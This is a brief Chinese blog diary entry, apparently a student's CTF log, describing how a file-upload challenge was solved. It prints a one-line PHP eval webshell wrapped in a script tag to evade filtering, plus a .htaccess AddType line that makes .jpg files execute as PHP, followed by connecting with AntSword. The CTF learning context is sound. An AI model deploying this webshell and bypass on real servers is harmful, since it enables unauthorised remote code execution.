文章讲述了作者在解决编码问题时,如何通过使用`script`标签定义PHP并利用`eval`绕过PHP过滤,成功上传隐藏的`.htaccess`文件,从而获取flag的过程。作者还提到明天的计划是完成剩余题目并总结经验。
昨天的编码选择问题问了师兄,只要选没被过滤的就能成功得到flag,另uft-8转16可以不用通过编译器
写upload
啊是week1文件上传的升级版,页面显示装了防盗门
一开始按照week1做法上传了一个一句话木马的php文件显示不能通过
后面改为jpg文件还是被检测出来了,所以得出他加的防盗门就是过滤掉php的
查了下这里需要先把php掩盖起来
可以用script的标签 定义编程语言,绕过php过滤
<script language="php"> @eval($_POST['1']);</script>
用这个代码可以把jpg文件映射为php(用txt写后改为.htaccess 文件先上传开路.htaccess
AddType application/x-httpd-php .jpg依次操作后就能得到上传成功的路径
空白界面但没有报错应该是成功了,用蚁剑检查一下有没有上传成功
然后在文件管理根目录就能找到flag啦
明天的计划是把week2剩下三个题写完,然后在进行一波总结
今天就先这样,睡了
扫一扫
173
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
